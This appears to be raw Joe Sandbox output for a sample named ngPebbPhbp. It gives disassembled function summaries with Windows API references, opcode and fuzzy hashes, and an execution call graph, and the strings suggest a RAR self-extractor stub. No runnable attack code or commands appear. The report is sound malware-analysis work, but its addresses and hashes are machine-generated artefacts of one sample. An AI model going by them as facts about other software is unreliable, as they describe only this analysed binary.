                                                  • Part of subcall function 00B1F1EC: GetObjectW.GDI32(?,00000018,?), ref: 00B1F224
                                                  • Part of subcall function 00B1F1EC: ReleaseDC.USER32(00000000,?), ref: 00B1F2BC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: ObjectRelease$CapsDevice
                                                • String ID: (
                                                • API String ID: 1061551593-3887548279
                                                • Opcode ID: 7e5d4c7bad8d175a4bec9659bacf756be7b1d4d66854fdf3adc0beb5f05a9879
                                                • Instruction ID: 69c9b1f530fb59b1b799869341da38bfd788e45ad765de037a1934c721f423d1
                                                • Opcode Fuzzy Hash: 7e5d4c7bad8d175a4bec9659bacf756be7b1d4d66854fdf3adc0beb5f05a9879
                                                • Instruction Fuzzy Hash: 1391F371608315AFC610DF65DC44A6BBBE9FF89710F10495EF98AE7260CB70E905CB62
                                                APIs
                                                  • Part of subcall function 00B179F7: GetSystemTime.KERNEL32(?,00000000), ref: 00B17A0F
                                                  • Part of subcall function 00B179F7: SystemTimeToFileTime.KERNEL32(?,?), ref: 00B17A1D
                                                  • Part of subcall function 00B179A0: __aulldiv.LIBCMT ref: 00B179A9
                                                • __aulldiv.LIBCMT ref: 00B0F162
                                                • GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,5EA84158,?,?,00000000,?,00000000,00B39F3D,000000FF), ref: 00B0F169
                                                  • Part of subcall function 00B01150: _wcslen.LIBCMT ref: 00B0115B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: Time$System__aulldiv$CurrentFileProcess_wcslen
                                                • String ID: .rartemp
                                                • API String ID: 3789791499-2558811017
                                                • Opcode ID: 509b777f90f2b312b35e36f75f7822c1211d62bea5ffeba1dc384aaab1eadf18
                                                • Instruction ID: b6ec183f48d44571f8d02c4f753c4c05591a18d9be7998a816b84a0151d981cb
                                                • Opcode Fuzzy Hash: 509b777f90f2b312b35e36f75f7822c1211d62bea5ffeba1dc384aaab1eadf18
                                                • Instruction Fuzzy Hash: 0E418271900249AFDB18EFA4CC45EEE7BE9EF54310F5045A9B915A3281EB349B49CB60
                                                APIs
                                                • __EH_prolog3.LIBCMT ref: 00B1DAD5
                                                  • Part of subcall function 00B10360: __EH_prolog3.LIBCMT ref: 00B10367
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: H_prolog3
                                                • String ID: Shell.Explorer$about:blank
                                                • API String ID: 431132790-874089819
                                                • Opcode ID: 2c84b4b802a2b8f37187eec448a62e457c6610712909724b7a5d2a6d87309da0
                                                • Instruction ID: 442cdb17273eff8d7ff398439448d7528191bc66327e302ffe48c7e6ef789caa
                                                • Opcode Fuzzy Hash: 2c84b4b802a2b8f37187eec448a62e457c6610712909724b7a5d2a6d87309da0
                                                • Instruction Fuzzy Hash: EE413E70600211DFDB18DFA4D895BAA77F5EF88700F6584EDE906AF2A1DB70AD80CB50
                                                APIs
                                                  • Part of subcall function 00B01E44: GetDlgItem.USER32(00000000,00003021), ref: 00B01E88
                                                  • Part of subcall function 00B01E44: SetWindowTextW.USER32(00000000,00B3C6C8), ref: 00B01E9E
                                                • EndDialog.USER32(?,00000001), ref: 00B2017B
                                                • SetDlgItemTextW.USER32(?,00000067,?), ref: 00B201B9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: ItemText$DialogWindow
                                                • String ID: GETPASSWORD1
                                                • API String ID: 445417207-3292211884
                                                • Opcode ID: b56e8fb190a218bd4bcb797b24c3a61de968da5b29c8ffd6058764e6d05a7fce
                                                • Instruction ID: 6239419971c25926859b459c2dc7f1af85b4e30461c460f51b3f3162431186f5
                                                • Opcode Fuzzy Hash: b56e8fb190a218bd4bcb797b24c3a61de968da5b29c8ffd6058764e6d05a7fce
                                                • Instruction Fuzzy Hash: C11129B265432477D230AA24AC85FFB77ECEB85702F0004A9F749B3091CB74A8518765
                                                APIs
                                                  • Part of subcall function 00B15094: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00B150B3
                                                  • Part of subcall function 00B15094: GetProcAddress.KERNEL32(00B551F8,CryptUnprotectMemory), ref: 00B150C3
                                                • GetCurrentProcessId.KERNEL32(?,00000200,?,00B15104), ref: 00B15197
                                                Strings
                                                • CryptProtectMemory failed, xrefs: 00B1514E
                                                • CryptUnprotectMemory failed, xrefs: 00B1518F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AddressProc$CurrentProcess
                                                • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                • API String ID: 2190909847-396321323
                                                • Opcode ID: e9d2980c35c553077efe7cdfcfe8c9e600c9c17f96614cb763c6174aa26d9ec7
                                                • Instruction ID: 50d23f10e1c0b177cae2602a69b0c1b823cee173c8a22a4a0be49c7a299dcddc
                                                • Opcode Fuzzy Hash: e9d2980c35c553077efe7cdfcfe8c9e600c9c17f96614cb763c6174aa26d9ec7
                                                • Instruction Fuzzy Hash: 0311E432601A24FBDB365F609C417AE3BE5EF80B62B5040D5FC117B291DB70AD9187E4
                                                APIs
                                                • IsWindowVisible.USER32(00010460), ref: 00B24291
                                                • DialogBoxParamW.USER32(GETPASSWORD1,00010460,00B20110,?), ref: 00B242BA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: DialogParamVisibleWindow
                                                • String ID: GETPASSWORD1
                                                • API String ID: 3157717868-3292211884
                                                • Opcode ID: cd1f6a067e009e4a0caadd1919dd4e1bf185df9ff19b6f37dcd91de514a4045a
                                                • Instruction ID: 9acb9ed77d120e11df90e1ae7359ecf64db03856bcc4083544ab5f704ceedcee
                                                • Opcode Fuzzy Hash: cd1f6a067e009e4a0caadd1919dd4e1bf185df9ff19b6f37dcd91de514a4045a
                                                • Instruction Fuzzy Hash: 0B0149312A5734FBC7206B65AC16F963BC8EB02313B0441C5F84AA35E1CFA0A844CB60
                                                APIs
                                                  • Part of subcall function 00B13EAA: _swprintf.LIBCMT ref: 00B13EEA
                                                  • Part of subcall function 00B13EAA: _strlen.LIBCMT ref: 00B13F0B
                                                  • Part of subcall function 00B13EAA: SetDlgItemTextW.USER32(?,00B4919C,?), ref: 00B13F64
                                                  • Part of subcall function 00B13EAA: GetWindowRect.USER32(?,?), ref: 00B13F9A
                                                  • Part of subcall function 00B13EAA: GetClientRect.USER32(?,?), ref: 00B13FA6
                                                • GetDlgItem.USER32(00000000,00003021), ref: 00B01E88
                                                • SetWindowTextW.USER32(00000000,00B3C6C8), ref: 00B01E9E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                • String ID: 0
                                                • API String ID: 2622349952-4108050209
                                                • Opcode ID: 584ed7905a56cb7cf1bfb5a25d7982bcdaeaaa497b412c1e8bfa3ef3f7a52ea9
                                                • Instruction ID: c8acbafaa8830078e792dbb37eef9f428035111223f7e04e31c80f07db7ca2c6
                                                • Opcode Fuzzy Hash: 584ed7905a56cb7cf1bfb5a25d7982bcdaeaaa497b412c1e8bfa3ef3f7a52ea9
                                                • Instruction Fuzzy Hash: 31F08C31544348A6DF190F64ED4ABEF3FD8BB04345F4489D4BC44652E1CBB4CA90EA60
                                                APIs
                                                • WaitForSingleObject.KERNEL32(?,000000FF,00B1770A,?,?,00B1777F,?,?,?,?,?,00B17769), ref: 00B175F3
                                                • GetLastError.KERNEL32(?,?,00B1777F,?,?,?,?,?,00B17769), ref: 00B175FF
                                                  • Part of subcall function 00B092EB: __EH_prolog3_GS.LIBCMT ref: 00B092F2
                                                Strings
                                                • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00B17608
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: ErrorH_prolog3_LastObjectSingleWait
                                                • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                • API String ID: 2419225763-2248577382
                                                • Opcode ID: e561f9d90c17972883fd5b2b5970e9229bdf212e13301a82a5a948e9469ed94e
                                                • Instruction ID: 652d9833e43fd1556106926b11c81c2d7d69f2d7b11f0fbbaf33903caed0241a
                                                • Opcode Fuzzy Hash: e561f9d90c17972883fd5b2b5970e9229bdf212e13301a82a5a948e9469ed94e
                                                • Instruction Fuzzy Hash: 70D05E3254C431B7D62423A86C0ACAE3E959B22330F700794F63A762F6DE20098183A9
                                                APIs
                                                • GetModuleHandleW.KERNEL32(00000000,?,00000000,?,00000000,00200000,?,?,00000000,0000005C,5EA84158), ref: 00B13E65
                                                • FindResourceW.KERNEL32(00000000,RTL,00000005), ref: 00B13E73
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: FindHandleModuleResource
                                                • String ID: RTL
                                                • API String ID: 3537982541-834975271
                                                • Opcode ID: e2d2fb8f978df2febbfa06ff0522a640792903b58b58f85685e2056abeeb1eac
                                                • Instruction ID: 6268894cb1a921ebc90f53272446e3299748889fbac268bdb6fb94b181787dbb
                                                • Opcode Fuzzy Hash: e2d2fb8f978df2febbfa06ff0522a640792903b58b58f85685e2056abeeb1eac
                                                • Instruction Fuzzy Hash: A5C01231640350A6E73417B16D0DB872DD89B04B15F150498F505AA0E0DAE5D4418BA0

                                                Execution Graph

                                                Execution Coverage:3.9%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:1.8%
                                                Total number of Nodes:2000
                                                Total number of Limit Nodes:52
                                                execution_graph 91540 3ce6dd 91542 3ce68a 91540->91542 91543 3de753 SHGetFolderPathW 91542->91543 91546 3784b7 91543->91546 91545 3de780 91545->91542 91547 3b65bb 91546->91547 91548 3784c7 _wcslen 91546->91548 91577 3796d9 91547->91577 91551 378502 91548->91551 91552 3784dd 91548->91552 91550 3b65c4 91550->91550 91559 39016b 91551->91559 91558 378894 8 API calls 91552->91558 91555 3784e5 __fread_nolock 91555->91545 91556 37850e 91568 39019b 91556->91568 91558->91555 91562 390170 ___std_exception_copy 91559->91562 91560 39018a 91560->91556 91562->91560 91564 39018c 91562->91564 91581 39523d 7 API calls 2 library calls 91562->91581 91563 3909fd 91583 393634 RaiseException 91563->91583 91564->91563 91582 393634 RaiseException 91564->91582 91566 390a1a 91566->91556 91569 39016b ___std_exception_copy 91568->91569 91570 39018a 91569->91570 91573 39018c 91569->91573 91584 39523d 7 API calls 2 library calls 91569->91584 91570->91555 91572 3909fd 91586 393634 RaiseException 91572->91586 91573->91572 91585 393634 RaiseException 91573->91585 91575 390a1a 91575->91555 91578 3796e7 91577->91578 91580 3796f0 __fread_nolock 91577->91580 91578->91580 91587 37c269 91578->91587 91580->91550 91581->91562 91582->91563 91583->91566 91584->91569 91585->91572 91586->91575 91588 37c27c 91587->91588 91589 37c279 __fread_nolock 91587->91589 91590 39016b 8 API calls 91588->91590 91589->91580 91591 37c287 91590->91591 91592 39019b 8 API calls 91591->91592 91592->91589 91593 3ce71e 91594 3ce747 91593->91594 91595 3ce737 GetProcAddress 91593->91595 91596 3ce762 FreeLibrary 91594->91596 91597 3ce610 91594->91597 91595->91594 91596->91597 91598 371033 91603 376686 91598->91603 91602 371042 91611 37bf07 91603->91611 91608 376791 91609 371038 91608->91609 91619 3768e6 8 API calls __fread_nolock 91608->91619 91610 390433 29 API calls __onexit 91609->91610 91610->91602 91612 39019b 8 API calls 91611->91612 91613 37bf1c 91612->91613 91614 39016b 8 API calls 91613->91614 91615 3766f4 91614->91615 91616 3755cc 91615->91616 91620 3755f8 91616->91620 91619->91608 91621 3755eb 91620->91621 91622 375605 91620->91622 91621->91608 91622->91621 91623 37560c RegOpenKeyExW 91622->91623 91623->91621 91624 375626 RegQueryValueExW 91623->91624 91625 375647 91624->91625 91626 37565c RegCloseKey 91624->91626 91625->91626 91626->91621 91627 3ce5f8 GetUserNameW 91628 3ce610 91627->91628 91629 3c64f9 91630 39016b 8 API calls 91629->91630 91631 3c6500 91630->91631 91632 3c6519 __fread_nolock 91631->91632 91633 39019b 8 API calls 91631->91633 91634 39019b 8 API calls 91632->91634 91633->91632 91635 3c653e 91634->91635 91636 37f470 91639 389fa5 91636->91639 91638 37f47c 91640 389fc6 91639->91640 91646 38a023 91639->91646 91640->91646 91648 3802f0 91640->91648 91643 3c800f 91643->91643 91644 38a067 91644->91638 91645 389ff7 91645->91644 91645->91646 91671 37be6d 91645->91671 91646->91644 91675 3e3ef6 81 API calls __wsopen_s 91646->91675 91667 380326 messages 91648->91667 91649 390433 29 API calls pre_c_initialization 91649->91667 91650 39016b 8 API calls 91650->91667 91651 3c62cf 91742 3e3ef6 81 API calls __wsopen_s 91651->91742 91653 381645 91657 37be6d 8 API calls 91653->91657 91665 38044d messages 91653->91665 91655 3c5c7f 91661 37be6d 8 API calls 91655->91661 91655->91665 91656 3c61fe 91741 3e3ef6 81 API calls __wsopen_s 91656->91741 91657->91665 91661->91665 91662 37be6d 8 API calls 91662->91667 91663 3905d2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 91663->91667 91664 37bf07 8 API calls 91664->91667 91665->91645 91666 3c60b9 91739 3e3ef6 81 API calls __wsopen_s 91666->91739 91667->91649 91667->91650 91667->91651 91667->91653 91667->91655 91667->91656 91667->91662 91667->91663 91667->91664 91667->91665 91667->91666 91669 390588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 91667->91669 91670 380a5e messages 91667->91670 91676 381940 91667->91676 91738 381e00 40 API calls messages 91667->91738 91669->91667 91740 3e3ef6 81 API calls __wsopen_s 91670->91740 91672 37be81 91671->91672 91674 37be90 __fread_nolock 91671->91674 91673 39019b 8 API calls 91672->91673 91672->91674 91673->91674 91674->91646 91675->91643 91677 3819de 91676->91677 91678 381966 91676->91678 91679 3c69f1 91677->91679 91695 3819ed 91677->91695 91680 3c6b04 91678->91680 91681 381973 91678->91681 91683 3c69fc 91679->91683 91684 3c6af8 91679->91684 91759 3f84db 254 API calls 2 library calls 91680->91759 91689 3c6b28 91681->91689 91690 38197d 91681->91690 91757 38b2d6 254 API calls 91683->91757 91758 3e3ef6 81 API calls __wsopen_s 91684->91758 91685 3c6b59 91691 3c6b64 91685->91691 91692 3c6b86 91685->91692 91686 3802f0 254 API calls 91686->91695 91689->91685 91693 3c6b40 91689->91693 91699 37be6d 8 API calls 91690->91699 91723 381990 messages 91690->91723 91761 3f84db 254 API calls 2 library calls 91691->91761 91762 3f5fe6 8 API calls 91692->91762 91760 3e3ef6 81 API calls __wsopen_s 91693->91760 91694 3c691d 91756 3e3ef6 81 API calls __wsopen_s 91694->91756 91695->91686 91695->91694 91698 381b65 91695->91698 91704 3c68ac 91695->91704 91713 381b59 91695->91713 91695->91723 91726 381aa4 91695->91726 91698->91667 91699->91723 91702 3c6d7d 91708 3c6db3 91702->91708 91866 3f80ce 65 API calls 91702->91866 91703 3c6b91 91706 3c6c25 91703->91706 91718 3c6bac 91703->91718 91755 3e3ef6 81 API calls __wsopen_s 91704->91755 91835 3e19ed 8 API calls 91706->91835 91711 37b3fe 8 API calls 91708->91711 91709 3c6d5b 91839 378e70 91709->91839 91716 3819d3 messages 91711->91716 91712 37be6d 8 API calls 91712->91723 91713->91698 91754 3e3ef6 81 API calls __wsopen_s 91713->91754 91715 3c6d91 91719 378e70 52 API calls 91715->91719 91716->91667 91763 3e13a0 8 API calls 91718->91763 91724 3c6d99 _wcslen 91719->91724 91722 3c68c1 messages 91722->91694 91722->91716 91732 381b12 messages 91722->91732 91723->91702 91723->91716 91838 3f7f8f 53 API calls __wsopen_s 91723->91838 91724->91708 91736 37b3fe 8 API calls 91724->91736 91725 3c6c37 91836 37bc9b 8 API calls 91725->91836 91726->91713 91743 381c50 91726->91743 91727 381b05 91727->91713 91727->91732 91730 3c6d63 _wcslen 91730->91702 91862 37b3fe 91730->91862 91731 3c6bd6 91764 382ad0 91731->91764 91732->91712 91732->91716 91732->91723 91735 3c6c40 91837 3e13a0 8 API calls 91735->91837 91736->91708 91738->91667 91739->91670 91740->91665 91741->91665 91742->91665 91744 381c62 91743->91744 91746 381c6b 91744->91746 91747 381d20 91744->91747 91873 38b71c 8 API calls 91744->91873 91746->91747 91748 39016b 8 API calls 91746->91748 91747->91727 91749 381d89 91748->91749 91750 39016b 8 API calls 91749->91750 91751 381d92 91750->91751 91867 37b25f 91751->91867 91754->91716 91755->91722 91756->91723 91757->91732 91758->91680 91759->91723 91760->91716 91761->91723 91762->91703 91763->91731 91765 382f70 91764->91765 91766 382b36 91764->91766 92236 3905d2 5 API calls __Init_thread_wait 91765->92236 91768 3c7b7c 91766->91768 91769 382b50 91766->91769 92240 3f79f9 254 API calls 91768->92240 91874 3830e0 91769->91874 91771 382f7a 91775 37b25f 8 API calls 91771->91775 91779 382fbb 91771->91779 91773 3c7b88 91773->91723 91783 382f94 91775->91783 91776 3830e0 9 API calls 91777 382b76 91776->91777 91778 382bac 91777->91778 91777->91779 91781 3c7b91 91778->91781 91804 382bc8 __fread_nolock 91778->91804 91780 382fec 91779->91780 91779->91781 91782 37b3fe 8 API calls 91780->91782 92241 3e3ef6 81 API calls __wsopen_s 91781->92241 91785 382ff9 91782->91785 92237 390588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 91783->92237 92238 38e662 254 API calls 91785->92238 91788 3c7bb9 92242 3e3ef6 81 API calls __wsopen_s 91788->92242 91790 382cef 91791 3c7c1c 91790->91791 91792 382cfc 91790->91792 92244 3f60a2 53 API calls _wcslen 91791->92244 91793 3830e0 9 API calls 91792->91793 91795 382d09 91793->91795 91798 3c7d45 91795->91798 91800 3830e0 9 API calls 91795->91800 91796 39016b 8 API calls 91796->91804 91797 39019b 8 API calls 91797->91804 91808 3c7bb4 91798->91808 92245 3e3ef6 81 API calls __wsopen_s 91798->92245 91799 383032 92239 38fe59 8 API calls 91799->92239 91806 382d23 91800->91806 91803 3802f0 254 API calls 91803->91804 91804->91785 91804->91788 91804->91790 91804->91796 91804->91797 91804->91803 91805 3c7bfd 91804->91805 91804->91808 92243 3e3ef6 81 API calls __wsopen_s 91805->92243 91806->91798 91809 37be6d 8 API calls 91806->91809 91811 382d87 messages 91806->91811 91808->91723 91809->91811 91810 3830e0 9 API calls 91810->91811 91811->91798 91811->91799 91811->91808 91811->91810 91813 382e3b messages 91811->91813 91884 3e6561 91811->91884 91891 3feb63 91811->91891 91927 3e874a 91811->91927 91954 3fa5ac 91811->91954 91962 3fac49 91811->91962 91967 3ede5d 91811->91967 91972 3f9eea 91811->91972 91975 3fa8ae 91811->91975 91983 3de9c5 GetFileAttributesW 91811->91983 91985 38f95e 91811->91985 91992 377953 91811->91992 91996 3e4ad5 91811->91996 92001 3e95f6 91811->92001 92016 3e8e39 91811->92016 92035 3e65b4 91811->92035 92040 3fcd16 91811->92040 92129 3fa4b4 91811->92129 92135 38be75 91811->92135 92192 3e5ed5 91811->92192 92222 3e6d2d 91811->92222 91812 382edd 91812->91723 91813->91812 92235 38e29c 8 API calls messages 91813->92235 91835->91725 91836->91735 91837->91723 91838->91709 91840 378e85 91839->91840 91856 378e82 91839->91856 91841 378e8d 91840->91841 91843 378ebb 91840->91843 93071 395556 26 API calls 91841->93071 91844 3b6b10 91843->91844 91847 378ecd 91843->91847 91853 3b6a29 91843->91853 93074 395513 26 API calls 91844->93074 91845 378e9d 91851 39016b 8 API calls 91845->91851 93072 38fe8f 51 API calls 91847->93072 91848 3b6b28 91848->91848 91852 378ea7 91851->91852 91854 37b25f 8 API calls 91852->91854 91855 39019b 8 API calls 91853->91855 91861 3b6aa2 91853->91861 91854->91856 91857 3b6a72 91855->91857 91856->91730 91858 39016b 8 API calls 91857->91858 91859 3b6a99 91858->91859 91860 37b25f 8 API calls 91859->91860 91860->91861 93073 38fe8f 51 API calls 91861->93073 91863 37b40c 91862->91863 91864 37b412 91862->91864 91863->91864 91865 37be6d 8 API calls 91863->91865 91864->91702 91865->91864 91866->91715 91868 37b26e _wcslen 91867->91868 91869 39019b 8 API calls 91868->91869 91870 37b296 __fread_nolock 91869->91870 91871 39016b 8 API calls 91870->91871 91872 37b2ac 91871->91872 91872->91727 91873->91746 91875 383121 91874->91875 91880 3830fd 91874->91880 92246 3905d2 5 API calls __Init_thread_wait 91875->92246 91876 382b60 91876->91776 91879 38312b 91879->91880 92247 390588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 91879->92247 91880->91876 92248 3905d2 5 API calls __Init_thread_wait 91880->92248 91881 389ec7 91881->91876 92249 390588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 91881->92249 91885 378e70 52 API calls 91884->91885 91886 3e6577 91885->91886 92250 3ddb69 91886->92250 91892 37bf07 8 API calls 91891->91892 91893 3feb7a 91892->91893 91894 378e70 52 API calls 91893->91894 91895 3feb89 91894->91895 92401 377a14 91895->92401 91898 378e70 52 API calls 91899 3feba9 91898->91899 91900 3fec26 91899->91900 91901 3febc1 91899->91901 91902 378e70 52 API calls 91900->91902 92425 37c92d 91901->92425 91904 3fec2b 91902->91904 91906 3fec38 91904->91906 91907 3fec73 91904->91907 91905 3febc6 91905->91906 91908 3febdf 91905->91908 92430 376ab6 91906->92430 91909 3fec8b 91907->91909 91912 37c92d 39 API calls 91907->91912 91911 378685 8 API calls 91908->91911 91913 3feca4 91909->91913 91915 37c92d 39 API calls 91909->91915 91914 3febec 91911->91914 91912->91909 91916 37be6d 8 API calls 91913->91916 91917 377af4 8 API calls 91914->91917 91915->91913 91918 3fecbe 91916->91918 91921 3febfa 91917->91921 92406 3d9b57 91918->92406 91920 3fec45 91920->91811 91923 378685 8 API calls 91921->91923 91922 3fec21 92444 377a59 91922->92444 91924 3fec13 91923->91924 91925 377af4 8 API calls 91924->91925 91925->91922 91928 3e875a __wsopen_s 91927->91928 91929 378e70 52 API calls 91928->91929 91930 3e877b 91929->91930 91931 37c92d 39 API calls 91930->91931 91938 3e8799 91930->91938 91931->91938 91932 378e70 52 API calls 91933 3e887c 91932->91933 91934 37557e 9 API calls 91933->91934 91935 3e88a7 91934->91935 92464 39d913 91935->92464 91937 3e88cd 91939 3e88f7 GetCurrentDirectoryW SetCurrentDirectoryW 91937->91939 91938->91932 91940 3e8973 91938->91940 91939->91940 91941 3e8921 91939->91941 91940->91811 92467 3de387 lstrlenW 91941->92467 91944 3de9c5 GetFileAttributesW 91945 3e8938 91944->91945 91946 3e8940 GetFileAttributesW SetFileAttributesW 91945->91946 91953 3e89cb 91945->91953 91947 3e8969 SetCurrentDirectoryW 91946->91947 91948 3e89b1 91946->91948 91947->91940 91950 3e89b5 SetCurrentDirectoryW 91948->91950 91951 3e8a02 SetCurrentDirectoryW 91948->91951 91950->91953 91951->91940 91952 3e89ea 91952->91951 92472 3e9f9f FindFirstFileW 